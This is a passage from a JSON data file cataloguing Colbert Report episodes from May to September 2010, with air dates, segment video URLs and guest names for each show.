        "http://thecolbertreport.cc.com/videos/caaib9/times-square-terrorism",
        "http://thecolbertreport.cc.com/videos/i2zwg4/fda-salt-regulation---lori-roman---michael-jacobson",
        "http://thecolbertreport.cc.com/videos/bfve2i/bp-s-undersea-dome",
        "http://thecolbertreport.cc.com/videos/6yc052/elizabeth-warren",
        "http://thecolbertreport.cc.com/videos/jj9r4k/sign-off---lady-liberty-souvenirs"
      ],
      "guest": "Elizabeth Warren"
    },
    {
      "date": "2010-05-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dula0l/intro---05-04-10",
        "http://thecolbertreport.cc.com/videos/zfi7tc/boom--doesn-t-go-the-dynamite",
        "http://thecolbertreport.cc.com/videos/dvwpph/the-word---flight-risk",
        "http://thecolbertreport.cc.com/videos/xyjhb7/stephen-hawking-is-such-an-a-hole---time-travel",
        "http://thecolbertreport.cc.com/videos/j2pf36/mark-moffett",
        "http://thecolbertreport.cc.com/videos/d97fmn/sign-off---michael-j--fox-gets-locked-in"
      ],
      "guest": "Michael J. Fox, Mark W. Moffett"
    },
    {
      "date": "2010-05-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nlh1ly/intro---05-05-10",
        "http://thecolbertreport.cc.com/videos/2nfnz7/nashville-flood-wakeboarder",
        "http://thecolbertreport.cc.com/videos/bw8v97/the-enemy-within---backyard-clothesline",
        "http://thecolbertreport.cc.com/videos/2p2tqn/alpha-dog-of-the-week---george-rekers",
        "http://thecolbertreport.cc.com/videos/pnjs6i/dave-isay",
        "http://thecolbertreport.cc.com/videos/xufsxi/sign-off---dancing-with-julian"
      ],
      "guest": "David Isay"
    },
    {
      "date": "2010-05-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pvx1hb/white-people-prayer-gap",
        "http://thecolbertreport.cc.com/videos/97ikxz/british-election-couverage---andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/8a0q0r/movies-that-are-destroying-america---2010-summer-movie-edition",
        "http://thecolbertreport.cc.com/videos/xo7hie/stewart-brand",
        "http://thecolbertreport.cc.com/videos/0txjlv/sign-off---the-usa-today"
      ],
      "guest": "Stewart Brand"
    },
    {
      "date": "2010-05-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8bpcly/intro---05-10-10",
        "http://thecolbertreport.cc.com/videos/0m67h9/house-returns-the-favor",
        "http://thecolbertreport.cc.com/videos/pxkemd/greece-wither-soon---scheherazade-rehman",
        "http://thecolbertreport.cc.com/videos/oejc0z/oil-containment-solution-randomizer",
        "http://thecolbertreport.cc.com/videos/6ikft9/gary-johnson",
        "http://thecolbertreport.cc.com/videos/xeq5yb/sign-off---goodnight"
      ],
      "guest": "Gov. Gary Johnson"
    },
    {
      "date": "2010-05-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n8gkaf/intro---05-11-10",
        "http://thecolbertreport.cc.com/videos/pcdm2a/consumer-alert---best-friends-charm-bracelets",
        "http://thecolbertreport.cc.com/videos/1227nt/kagan-worship---dahlia-lithwick",
        "http://thecolbertreport.cc.com/videos/rp68kf/australian-sperm-shortage",
        "http://thecolbertreport.cc.com/videos/d04me7/hampton-sides",
        "http://thecolbertreport.cc.com/videos/qv4b2o/sign-off---wriststrong-arm"
      ],
      "guest": "Hampton Sides"
    },
    {
      "date": "2010-05-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nyl5ye/intro---05-12-10",
        "http://thecolbertreport.cc.com/videos/rxu3ed/controlled-burn-of-a-natural-gas",
        "http://thecolbertreport.cc.com/videos/zf5e7d/threatdown---military-food-police--jazz-robots---pretty-girls",
        "http://thecolbertreport.cc.com/videos/0mg8t8/stephen-s-sound-advice---how-to-ace-the-sats",
        "http://thecolbertreport.cc.com/videos/jynvz7/deepak-chopra",
        "http://thecolbertreport.cc.com/videos/0mpxm3/sign-off---fire-extinguisher-shooting"
      ],
      "guest": "Deepak Chopra"
    },
    {
      "date": "2010-05-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uic1xz/intro---05-13-10",
        "http://thecolbertreport.cc.com/videos/mp7sng/confirming-elena",
        "http://thecolbertreport.cc.com/videos/o1qad4/the-hold-steady",
        "http://thecolbertreport.cc.com/videos/ugcamu/sign-off---time-traveling-brandy-thief"
      ],
      "guest": "The Hold Steady"
    },
    {
      "date": "2010-06-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1heoo5/intro---6-1-10",
        "http://thecolbertreport.cc.com/videos/395e6g/vodka-eyeballing",
        "http://thecolbertreport.cc.com/videos/6f9c47/up-brit-creek",
        "http://thecolbertreport.cc.com/videos/p943d0/failure-to-launch---atlantis-crew",
        "http://thecolbertreport.cc.com/videos/ngl48j/ayaan-hirsi-ali",
        "http://thecolbertreport.cc.com/videos/jygylj/sign-off---water-eyeballing"
      ],
      "guest": "Ayaan Hirsi Ali"
    },
    {
      "date": "2010-06-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6707v3/intro---6-2-10",
        "http://thecolbertreport.cc.com/videos/gqwbeo/japan-s-special-election---kazuo-myazaki",
        "http://thecolbertreport.cc.com/videos/qrxaw1/tip-wag---foxconn--charles-taylor---naomi-campbell",
        "http://thecolbertreport.cc.com/videos/4dk71f/craziest-f--ing-thing-i-ve-ever-heard---gored-bullfighter",
        "http://thecolbertreport.cc.com/videos/dvcqzb/lisa-miller",
        "http://thecolbertreport.cc.com/videos/a4ztpz/sign-off---parting-gifts-for-kazuo-myazaki"
      ],
      "guest": "Lisa Miller"
    },
    {
      "date": "2010-06-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d81bvl/intro---6-3-10",
        "http://thecolbertreport.cc.com/videos/iy7vo7/crude---unusual",
        "http://thecolbertreport.cc.com/videos/44gj25/who-s-watching-the-watchdog----liam-mccormack",
        "http://thecolbertreport.cc.com/videos/p34tly/who-s-riding-my-coattails-now----ipad-suit-pocket",
        "http://thecolbertreport.cc.com/videos/fo5d9i/vampire-weekend"
      ],
      "guest": "Vampire Weekend"
    },
    {
      "date": "2010-06-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r4arov/intro---6-7-10",
        "http://thecolbertreport.cc.com/videos/y0xgng/charity-begins-at-11-30",
        "http://thecolbertreport.cc.com/videos/lc7nxu/oil-s-well-that-never-ends",
        "http://thecolbertreport.cc.com/videos/c2l6b4/oil-spill-rage---james-carville",
        "http://thecolbertreport.cc.com/videos/30w6f5/jonathan-alter",
        "http://thecolbertreport.cc.com/videos/ow5rnp/sign-off---gulf-of-america-fund"
      ],
      "guest": "James Carville, Jonathan Alter"
    },
    {
      "date": "2010-06-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uj5obr/obama-s-whoomp--there-it-is-controversy",
        "http://thecolbertreport.cc.com/videos/yj9oop/the-word---p-r--mageddon",
        "http://thecolbertreport.cc.com/videos/n3e887/mark-frauenfelder",
        "http://thecolbertreport.cc.com/videos/r1zjxy/sign-off---the-most-useless-machine"
      ],
      "guest": "Mark Frauenfelder"
    },
    {
      "date": "2010-06-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ou7te0/helen-thomas-s-reputation",
        "http://thecolbertreport.cc.com/videos/0eesk5/formidable-opponent---michael-oren",
        "http://thecolbertreport.cc.com/videos/41cjs4/shout-out---7th-eaccs",
        "http://thecolbertreport.cc.com/videos/12z179/sam-nunn",
        "http://thecolbertreport.cc.com/videos/hv8uj4/sign-off---50-hamburgers"
      ],
      "guest": "Amb. Michael Oren, Sen. Sam Nunn"
    },
    {
      "date": "2010-06-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6iz8ha/bp-stock-sinks",
        "http://thecolbertreport.cc.com/videos/e46kh9/sport-report---soccer-debate---marc-fisher---mark-starr",
        "http://thecolbertreport.cc.com/videos/9rht3y/simulated-mars-mission",
        "http://thecolbertreport.cc.com/videos/19ikyl/alan-bean",
        "http://thecolbertreport.cc.com/videos/gewg17/sign-off---chocolate-syrup"
      ],
      "guest": "Alan Bean"
    },
    {
      "date": "2010-06-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7xsbh3/intro---6-14-10",
        "http://thecolbertreport.cc.com/videos/vlk9h9/america-s-strained-relationship-with-england",
        "http://thecolbertreport.cc.com/videos/xhnftx/smokin--pole---the-quest-for-arctic-riches--canada---china",
        "http://thecolbertreport.cc.com/videos/b6bfik/who-s-not-honoring-me-now----tonys---mtv-movie-awards",
        "http://thecolbertreport.cc.com/videos/bd9ero/stephen-prothero",
        "http://thecolbertreport.cc.com/videos/t2lbqh/sign-off---the-new-oxford-american-dictionary"
      ],
      "guest": "Stephen Prothero"
    },
    {
      "date": "2010-06-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ue0g9m/intro---6-15-10",
        "http://thecolbertreport.cc.com/videos/w6pwpk/testoster-ruin---hanna-rosin",
        "http://thecolbertreport.cc.com/videos/o42e2u/tip-wag---marshall-islands---disney-world-fate",
        "http://thecolbertreport.cc.com/videos/zkoqn2/carl-safina",
        "http://thecolbertreport.cc.com/videos/vr28jt/sign-off---hot-boxers"
      ],
      "guest": "Dr. Carl Safina"
    },
    {
      "date": "2010-06-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vtw6mw/intro---6-16-10",
        "http://thecolbertreport.cc.com/videos/atwjd4/obama-s-bp-oil-spill-speech",
        "http://thecolbertreport.cc.com/videos/fq1qpx/the-word----tay-the-cour-e",
        "http://thecolbertreport.cc.com/videos/0occfp/brevity-is-the-soul-of-twit",
        "http://thecolbertreport.cc.com/videos/ak28k2/devo"
      ],
      "guest": "Devo"
    },
    {
      "date": "2010-06-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zp0vlt/exclusive---who-s-watching-the-watchdog-pt--1",
        "http://thecolbertreport.cc.com/videos/mgk9uw/exclusive---who-s-watching-the-watchdog-pt--2",
        "http://thecolbertreport.cc.com/videos/lmlfss/obama-s-simplified-bp-oil-spill-speech",
        "http://thecolbertreport.cc.com/videos/r0x7kl/south-carolina-s-4th-district-primary---bob-inglis",
        "http://thecolbertreport.cc.com/videos/pw3z5k/colbert-platinum---summer-travel-edition",
        "http://thecolbertreport.cc.com/videos/psfs9q/david-mamet",
        "http://thecolbertreport.cc.com/videos/t0bf7h/sign-off---retweet-for-the-gulf-of-america-fund"
      ],
      "guest": "David Mamet"
    },
    {
      "date": "2010-06-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3xh3zp/us-ties-with-slovenia",
        "http://thecolbertreport.cc.com/videos/tsbncg/fallback-position---astronaut-pt--1",
        "http://thecolbertreport.cc.com/videos/lw3o9e/joe-barton-s-misconstrued-misconstruction",
        "http://thecolbertreport.cc.com/videos/6rxgjl/wes-moore",
        "http://thecolbertreport.cc.com/videos/xr56ob/sign-off---spare-cursed-monkey-s-paw"
      ],
      "guest": "Wes Moore"
    },
    {
      "date": "2010-06-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/f7v2qo/who-s-riding-my-coattails-now----ipad-suit-pocket",
        "http://thecolbertreport.cc.com/videos/mt3j86/stanley-mcchrystal-talks-to-rolling-stone",
        "http://thecolbertreport.cc.com/videos/dry79y/fallback-position---astronaut-pt--2",
        "http://thecolbertreport.cc.com/videos/eyzb5g/usa-board-of-ophthalmological-freedom",
        "http://thecolbertreport.cc.com/videos/ej23e4/gloria-steinem",
        "http://thecolbertreport.cc.com/videos/jewfph/sign-off---goodnight"
      ],
      "guest": "Gloria Steinem"
    },
    {
      "date": "2010-06-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h4yffi/intro---6-23-10",
        "http://thecolbertreport.cc.com/videos/wcoc11/us-defeats-algeria",
        "http://thecolbertreport.cc.com/videos/licobk/yahweh-or-no-way---the-blues-brothers---glenn-beck",
        "http://thecolbertreport.cc.com/videos/3dk57p/prophet-glenn-beck---father-guido-sarducci",
        "http://thecolbertreport.cc.com/videos/quds8l/tim-westergren",
        "http://thecolbertreport.cc.com/videos/p3f9t8/sign-off---tomorrow-s-fallback-position"
      ],
      "guest": "Tim Westergren"
    },
    {
      "date": "2010-06-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/k3vali/intro---6-24-10",
        "http://thecolbertreport.cc.com/videos/i8ohf4/put-the-cursed-monkey-paw-down",
        "http://thecolbertreport.cc.com/videos/5m2oyq/the-word---weapon-of-mass-construction",
        "http://thecolbertreport.cc.com/videos/6ppo8y/fallback-position---astronaut-pt--3",
        "http://thecolbertreport.cc.com/videos/3td47y/michael-specter",
        "http://thecolbertreport.cc.com/videos/86kjse/sign-off---general-s-cap"
      ],
      "guest": "Michael Specter"
    },
    {
      "date": "2010-06-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cchudg/robert-c--byrd-dies-at-92",
        "http://thecolbertreport.cc.com/videos/t7kbm8/rolling-stone-article-on-mcchrystal---michael-hastings",
        "http://thecolbertreport.cc.com/videos/nxs1np/doomsday-bunkers",
        "http://thecolbertreport.cc.com/videos/kpz62f/john-waters",
        "http://thecolbertreport.cc.com/videos/q1un38/sign-off---goodnight"
      ],
      "guest": "Michael Hastings, John Waters"
    },
    {
      "date": "2010-06-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8w7w4q/intro---6-29-10",
        "http://thecolbertreport.cc.com/videos/5i29xg/supreme-court-justice-sweetness",
        "http://thecolbertreport.cc.com/videos/gxmj8l/basketcase---stephie-s-knicks-hoop-de-doo-pt--1",
        "http://thecolbertreport.cc.com/videos/cxtlq7/lube-job",
        "http://thecolbertreport.cc.com/videos/t7eba8/julian-castro",
        "http://thecolbertreport.cc.com/videos/6s4ag9/sign-off---sweetness"
      ],
      "guest": "Mayor Julian Castro"
    },
    {
      "date": "2010-06-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4nay3b/mysteries-of-the-ancient-unknown---king-tut-s-penis-pt--1",
        "http://thecolbertreport.cc.com/videos/200t0y/cold-war-update---north-korea---russian-spies",
        "http://thecolbertreport.cc.com/videos/85xlkw/nicholas-carr",
        "http://thecolbertreport.cc.com/videos/zz75v5/sign-off---goodnight"
      ],
      "guest": "Nicholas Carr"
    },
    {
      "date": "2010-07-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qkh2oy/intro---7-1-10",
        "http://thecolbertreport.cc.com/videos/p1rz8m/al-qaeda-starts-inspire-magazine",
        "http://thecolbertreport.cc.com/videos/ytd0xh/threatdown---dawn--actual-food---texas-gop",
        "http://thecolbertreport.cc.com/videos/zgf08n/tangelo-american-john-boehner",
        "http://thecolbertreport.cc.com/videos/7p27ga/manny-howard",
        "http://thecolbertreport.cc.com/videos/lruog2/sign-off---obsessive-compulsive-disorder"
      ],
      "guest": "Manny Howard"
    },
    {
      "date": "2010-07-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/88l8y3/stephen-is-sick",
        "http://thecolbertreport.cc.com/videos/yw04k6/electronic-frontier-foundation---cindy-cohn",
        "http://thecolbertreport.cc.com/videos/2vgxvc/unemployment-benefits---paul-krugman",
        "http://thecolbertreport.cc.com/videos/tod2oy/michio-kaku",
        "http://thecolbertreport.cc.com/videos/59nr33/sign-off---the-hot-zone"
      ],
      "guest": "Paul Krugman, Dr. Michio Kaku"
    },
    {
      "date": "2010-07-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jogb92/intro---7-6-10",
        "http://thecolbertreport.cc.com/videos/vh6d9y/latest-soap-opera-news",
        "http://thecolbertreport.cc.com/videos/v4t63q/the-word---the-white-stuff",
        "http://thecolbertreport.cc.com/videos/52xc1z/i-s-on-edjukashun---loyola--texas-textbooks---wal-mart",
        "http://thecolbertreport.cc.com/videos/44dhom/garret-keizer",
        "http://thecolbertreport.cc.com/videos/p9lstk/sign-off---goodnight"
      ],
      "guest": "Garret Keizer"
    },
    {
      "date": "2010-07-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yx0x8s/the-carell-corral",
        "http://thecolbertreport.cc.com/videos/u8pmv7/the-economist-photoshops-obama-s-picture",
        "http://thecolbertreport.cc.com/videos/2vaaww/thought-for-food---kentucky-tuna---grilled-cheese-burger-melt",
        "http://thecolbertreport.cc.com/videos/7ctnwz/formula-401--beauty-from-my-beast",
        "http://thecolbertreport.cc.com/videos/s7mibo/steve-carell",
        "http://thecolbertreport.cc.com/videos/ytvd7r/sign-off---2010-sexy-spermatozoa-calendar"
      ],
      "guest": "Steve Carell"
    },
    {
      "date": "2010-07-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/381yrb/intro---7-8-10",
        "http://thecolbertreport.cc.com/videos/x5lln0/modest-con-2010",
        "http://thecolbertreport.cc.com/videos/zjdl0i/automatics-for-the-people---ilya-shapiro---jackie-hilly",
        "http://thecolbertreport.cc.com/videos/eieifn/emergency-thought-for-food---candwich-setback",
        "http://thecolbertreport.cc.com/videos/nlmfgk/arturo-rodriguez",
        "http://thecolbertreport.cc.com/videos/oc0gsm/sign-off---go-get-a-tan"
      ],
      "guest": "Arturo Rodriguez"
    },
    {
      "date": "2010-07-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xsaeav/intro---7-26-10",
        "http://thecolbertreport.cc.com/videos/snrn4u/stephen-s-eco-vacation",
        "http://thecolbertreport.cc.com/videos/qqashr/racial-pro-firing",
        "http://thecolbertreport.cc.com/videos/1axxh8/nailed--em---polka-piracy",
        "http://thecolbertreport.cc.com/videos/u5kfga/hephzibah-anderson",
        "http://thecolbertreport.cc.com/videos/rcl3ml/sign-off---bud-light-lime"
      ],
      "guest": "Hephzibah Anderson"
    },
    {
      "date": "2010-07-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/aiaw4g/intro---7-27-10",
        "http://thecolbertreport.cc.com/videos/56iw57/bp-s-live-hayward-cam",
        "http://thecolbertreport.cc.com/videos/m571z2/that-s-the-way-i-leak-it---tom-blanton",
        "http://thecolbertreport.cc.com/videos/431v9v/tip-wag---baby-gap--dick-cheney---plants",
        "http://thecolbertreport.cc.com/videos/2afxlp/kevin-kline",
        "http://thecolbertreport.cc.com/videos/y6qd20/sign-off---goodnight"
      ],
      "guest": "Thomas S. Blanton, Kevin Kline"
    },
    {
      "date": "2010-07-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/it4pai/obama-blows-off-the-boy-scouts",
        "http://thecolbertreport.cc.com/videos/ce9wme/the-word---ownership-society",
        "http://thecolbertreport.cc.com/videos/k9y4mw/republican-gubernatorial-primary-battle-watch--010---tennessee",
        "http://thecolbertreport.cc.com/videos/hjiro1/elon-musk",
        "http://thecolbertreport.cc.com/videos/fl5n9q/sign-off---bit-of-advice"
      ],
      "guest": "Elon Musk"
    },
    {
      "date": "2010-07-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cjuayn/intro---7-29-10",
        "http://thecolbertreport.cc.com/videos/dzk032/the-oil-is-missing",
        "http://thecolbertreport.cc.com/videos/i9hga3/thought-for-food---cereal--foot-long-cheeseburger---ecobot-iii",
        "http://thecolbertreport.cc.com/videos/jt67k1/apology-box",
        "http://thecolbertreport.cc.com/videos/sdjfj9/andy-cohen",
        "http://thecolbertreport.cc.com/videos/6hqby7/sign-off---cocktails"
      ],
      "guest": "Andy Cohen"
    },
    {
      "date": "2010-08-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/07zpy3/intro---8-2-10",
        "http://thecolbertreport.cc.com/videos/o9k8cr/stephen-might-be-gay",
        "http://thecolbertreport.cc.com/videos/wx3505/sport-report---london-olympics---illegal-bullfighting",
        "http://thecolbertreport.cc.com/videos/3dwyx0/alpha-dog-of-the-week---david-h--brooks",
        "http://thecolbertreport.cc.com/videos/ln5q1u/jimmy-cliff"
      ],
      "guest": "Jimmy Cliff"
    },
    {
      "date": "2010-08-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s8t2k9/brett-favre-retires-again",
        "http://thecolbertreport.cc.com/videos/noj1lw/consumer-protection-agency---barney-frank",
        "http://thecolbertreport.cc.com/videos/jrpte4/republican-gubernatorial-primary-battle-watch--010---basil-marceaux-com",
        "http://thecolbertreport.cc.com/videos/a5r0r5/laura-ingraham",
        "http://thecolbertreport.cc.com/videos/9838f3/sign-off---credit-card-agreement"
      ],
      "guest": "Laura Ingraham"
    },
    {
      "date": "2010-08-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eirad0/basil-marceaux-com---obama-s-birthday",
        "http://thecolbertreport.cc.com/videos/4mbc26/p-k--winsome---black-viewer-ratings",
        "http://thecolbertreport.cc.com/videos/vhx4eu/threat-standdown---monkey-terrorism",
        "http://thecolbertreport.cc.com/videos/t5nlmh/michael-posner",
        "http://thecolbertreport.cc.com/videos/gc9gia/sign-off---nielsen-mandela"
      ],
      "guest": "Michael Posner"
    },
    {
      "date": "2010-08-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tsl05q/intro---8-5-10",
        "http://thecolbertreport.cc.com/videos/1qu0ts/how-to-ruin-same-sex-marriages",
        "http://thecolbertreport.cc.com/videos/gw1rft/pope-s-baseball-cap---catholictv",
        "http://thecolbertreport.cc.com/videos/bdzvwl/savion-glover",
        "http://thecolbertreport.cc.com/videos/our78a/sign-off---tap-dancing"
      ],
      "guest": "Savion Glover"
    },
    {
      "date": "2010-08-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cfbxpk/intro---8-10-10",
        "http://thecolbertreport.cc.com/videos/40r2zf/honoring-martin-luther-king",
        "http://thecolbertreport.cc.com/videos/jbgt2s/citizenship-down---akhil-amar",
        "http://thecolbertreport.cc.com/videos/v2az23/alpha-dog-of-the-week---steven-slater",
        "http://thecolbertreport.cc.com/videos/uhmewn/dylan-ratigan",
        "http://thecolbertreport.cc.com/videos/p3wgd1/sign-off---goodnight"
      ],
      "guest": "Dylan Ratigan"
    },
    {
      "date": "2010-08-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jwpn0p/moral-compass-5000-action-center",
        "http://thecolbertreport.cc.com/videos/tpcehb/david-finkel",
        "http://thecolbertreport.cc.com/videos/j0nge7/sign-off---goodnight"
      ],
      "guest": "David Finkel"
    },
    {
      "date": "2010-08-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ibivj9/intro---8-12-10",
        "http://thecolbertreport.cc.com/videos/t6cmn9/happy-ramadan",
        "http://thecolbertreport.cc.com/videos/tavgu2/the-word---weapon-of-mass-construction",
        "http://thecolbertreport.cc.com/videos/obv2rl/senior-moment",
        "http://thecolbertreport.cc.com/videos/lx17lm/chuck-close",
        "http://thecolbertreport.cc.com/videos/h6dwnn/sign-off---chuck-close-books"
      ],
      "guest": "Chuck Close"
    },
    {
      "date": "2010-08-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q61axv/growing-intelligence-community---richard-clarke",
        "http://thecolbertreport.cc.com/videos/yh08ag/invasion-of-the-country-snatchers",
        "http://thecolbertreport.cc.com/videos/gr3fyt/john-fetterman",
        "http://thecolbertreport.cc.com/videos/6ksdhb/sign-off---starbucks-latte"
      ],
      "guest": "Richard Clarke, John Fetterman"
    },
    {
      "date": "2010-08-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dlrtyi/intro---8-17-10",
        "http://thecolbertreport.cc.com/videos/c3sn86/newsweek-ranks-the-world-s-best-countries",
        "http://thecolbertreport.cc.com/videos/2hdefm/better-know-a-lobby---american-meat-institute",
        "http://thecolbertreport.cc.com/videos/tno3pg/fox-news-and-republican-party-make-it-official",
        "http://thecolbertreport.cc.com/videos/2kzgs4/barry-levine",
        "http://thecolbertreport.cc.com/videos/xsqp9j/sign-off---newsweek"
      ],
      "guest": "Barry Levine"
    },
    {
      "date": "2010-08-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vby4js/intro---8-18-10",
        "http://thecolbertreport.cc.com/videos/50c2du/brett-favre-returns-to-football",
        "http://thecolbertreport.cc.com/videos/08wn77/the-word---borderline-personality",
        "http://thecolbertreport.cc.com/videos/l06vi1/don-t-shoot-the-schlessinger",
        "http://thecolbertreport.cc.com/videos/389e2m/thomas-french",
        "http://thecolbertreport.cc.com/videos/b2scuj/sign-off---sharpened-broom-handle"
      ],
      "guest": "Thomas French"
    },
    {
      "date": "2010-08-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x0zwn9/intro---8-19-10",
        "http://thecolbertreport.cc.com/videos/m4f5im/the-word---what-if-you-threw-a-peace-and-nobody-came-",
        "http://thecolbertreport.cc.com/videos/2rjk08/all-s-well-that-ends-oil-well---michael-blum",
        "http://thecolbertreport.cc.com/videos/c2uztk/jon-krakauer",
        "http://thecolbertreport.cc.com/videos/g9w04r/sign-off---goodnight"
      ],
      "guest": "Jon Krakauer"
    },
    {
      "date": "2010-08-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zn0m8s/stephen-wins-an-emmy",
        "http://thecolbertreport.cc.com/videos/xa3l6x/the-word---losing-his-religion",
        "http://thecolbertreport.cc.com/videos/8vazj8/aqua-threatdown---oyster-sluts--japanese-hackers---israeli-regulators",
        "http://thecolbertreport.cc.com/videos/jjg6uf/leslie-kean",
        "http://thecolbertreport.cc.com/videos/gbrydj/sign-off---balloon"
      ],
      "guest": "Leslie Kean"
    },
    {
      "date": "2010-08-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8v2r6r/intro---8-24-10",
        "http://thecolbertreport.cc.com/videos/ay7pky/terror-bunker-5200",
        "http://thecolbertreport.cc.com/videos/rxmuip/the-word---control-self-delete",
        "http://thecolbertreport.cc.com/videos/7azwuj/mahmoody-blues",
        "http://thecolbertreport.cc.com/videos/vly30s/jeffrey-goldberg",
        "http://thecolbertreport.cc.com/videos/p0468k/sign-off---sanitized-goodnight"
      ],
      "guest": "Jeffrey Goldberg"
    },
    {
      "date": "2010-08-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ckwof5/john-mccain-s-victorious-defeat",
        "http://thecolbertreport.cc.com/videos/bn16zn/stephen-colbert-university---andrew-hacker",
        "http://thecolbertreport.cc.com/videos/nmp9j3/mysteries-of-the-ancient-unknown---king-tut-s-penis-pt--2",
        "http://thecolbertreport.cc.com/videos/boejnl/heidi-cullen",
        "http://thecolbertreport.cc.com/videos/8mv6il/sign-off---calculator"
      ],
      "guest": "Andrew Hacker, Heidi Cullen"
    },
    {
      "date": "2010-08-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8g8jfw/intro---8-26-10",
        "http://thecolbertreport.cc.com/videos/cg8fb2/fox-news-job-opening",
        "http://thecolbertreport.cc.com/videos/3k8c17/glenn-livid",
        "http://thecolbertreport.cc.com/videos/ozbh2e/you-mosque-be-kidding",
        "http://thecolbertreport.cc.com/videos/idhto6/richard-engel",
        "http://thecolbertreport.cc.com/videos/054o86/sign-off---speaking-fee"
      ],
      "guest": "Richard Engel"
    },
    {
      "date": "2010-09-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/99y0f6/intro---9-7-10",
        "http://thecolbertreport.cc.com/videos/xvxdbg/geese-witherspoon",
        "http://thecolbertreport.cc.com/videos/os39h8/better-know-a-district---delaware-s-at-large---mike-castle-update",
        "http://thecolbertreport.cc.com/videos/ylp5nt/anthony-romero",
        "http://thecolbertreport.cc.com/videos/olfody/sign-off---welcome-home-show"
      ],
      "guest": "Anthony Romero"
    },
    {
      "date": "2010-09-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ynyu8x/intro---9-8-10",
        "http://thecolbertreport.cc.com/videos/kmgrcb/been-there--won-that---joe-biden---yogi-berra",
        "http://thecolbertreport.cc.com/videos/l21o2y/been-there--won-that---ray-odierno",
        "http://thecolbertreport.cc.com/videos/dp7uzb/joe-biden",
        "http://thecolbertreport.cc.com/videos/r1r2jw/sign-off---thanks-to-the-returning-troops"
      ],
      "guest": "Vice President Joe Biden, Gen. Raymond Odierno"
    },
    {
      "date": "2010-09-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/txd70l/been-there--won-that---jim-webb",
        "http://thecolbertreport.cc.com/videos/tvmzxz/been-there--won-that---david-petraeus",
        "http://thecolbertreport.cc.com/videos/9543jt/brent-cummings---josh-bleill"
      ],
      "guest": "Sen. Jim Webb, Lt. Col. Brent Cummings, John Legend"
    },
    {
      "date": "2010-09-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4q0lgz/intro---9-13-10",
        "http://thecolbertreport.cc.com/videos/1x4nj0/microwave-programming",
        "http://thecolbertreport.cc.com/videos/wzt5ev/bears---balls---american-apparel---chocolatey",
        "http://thecolbertreport.cc.com/videos/nwwxfb/stop-sending-live-animals",
        "http://thecolbertreport.cc.com/videos/hr5uxa/lisa-birnbach",
        "http://thecolbertreport.cc.com/videos/w7kfgs/sign-off---goodnight"
      ],
      "guest": "Lisa Birnbach"
    },
    {
      "date": "2010-09-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zipkzm/intro---9-14-10",
        "http://thecolbertreport.cc.com/videos/pet2x5/peta-criticizes-joe-biden",
        "http://thecolbertreport.cc.com/videos/7cbxuw/the-word---mutually-assured-coercion",
        "http://thecolbertreport.cc.com/videos/oh49ge/luther-campbell-opposes-ground-zero-mosque",
        "http://thecolbertreport.cc.com/videos/yevohc/sean-wilentz",
        "http://thecolbertreport.cc.com/videos/fugenz/sign-off---goodnight"
      ],
      "guest": "Sean Wilentz"
    },
    {
      "date": "2010-09-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0hpaxs/intro---9-15-10",
        "http://thecolbertreport.cc.com/videos/f8g0cq/libertea",
        "http://thecolbertreport.cc.com/videos/7v15m5/atone-phone---joan-rivers-calls",
        "http://thecolbertreport.cc.com/videos/n9nk9d/saul-griffith",
        "http://thecolbertreport.cc.com/videos/mjozqh/sign-off---world-changing-announcement"
      ],
      "guest": "Saul Griffith"
    },
    {
      "date": "2010-09-16",
      "videos": [
